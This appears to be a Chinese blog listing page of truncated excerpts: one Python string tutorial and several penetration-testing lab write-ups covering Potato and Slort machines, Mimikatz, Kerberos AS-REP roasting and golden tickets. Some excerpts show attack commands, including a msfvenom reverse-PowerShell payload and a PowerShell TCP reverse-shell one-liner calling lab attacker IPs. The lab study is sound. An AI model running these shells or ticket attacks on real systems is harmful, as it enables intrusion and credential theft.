1.字符串的基本操作1.1 通过下标索引取值 正反都行my_str = 'abcdefghijklmn' value = my_str[2] print(f'my_str第三个字符为:{value}'） 1.2 index方法my_str = 'abcdefghijklmn' value = my_...

直接进入后渗透阶段我们再信息收集时还记得有一个MySQL服务没有测试 尝试进入数据库 尝试一些弱密码mysql -uroot -ptoor mysql -uadmin -padmin ......进不去 记住 我们还可以取看看/var/www/...

简介point 5PotatoDifficulty Easyrated by community Intermediate 实验环境攻击者 Kali 192.168.45.201受害者 IP 192.168.161.101  Linux 1. 信息收集收集受害者服务详情nmap -sV -A 192.1...

拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...

我们现在已经登录到了管理员页面 用wappalyzer查看使用的是什么服务 LMS moodle 查询如何查看版本https://www.isharkfly.com/t/moodle/4486 Google查询 moodle 2.2.3 exploit发现可以使用 e...

简介point 20SlortDifficulty INTERMEDIATErated by community INTERMEDIATE 实验环境攻击者 Kali 192.168.45.231受害者 IP 192.168.166.53 Windows 1. 信息收集收集受害者服务详情21/tcp ope...

1. Mimikatz介绍作者：Benjamin DelpyBeniamin Delpy最初创建 Mimikatz是为了向微软证明其身份验证协议容易受到攻击然而，这个工具在20之后仍然被广泛用于网络安全行业这个工具也是世界上最好的...

Kali使用pwsh编译$Text = '$client = New-Object System.Net.Sockets.TCPClient('192.168.45.211',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.R...

Kerberos 进行身份验证过程的第一步是发送 ASREQ。根据此请求，域控制器可以验证身份验证是否成功。如果是，域控制器将回复包含会话密钥和 TGT 的 AS-REP。此步骤通常也称为 Kerberos 预身份验...

任务从dollarcorp的DC拿到secrets使用krbtgt账户的secrets 制作一个黄金票据使用黄金票据(再一次)从一个机器拿到 doamin admin 权限 使用管理员权限运行终端C:\AD\Tools\ArgSplit.bat asktgtse...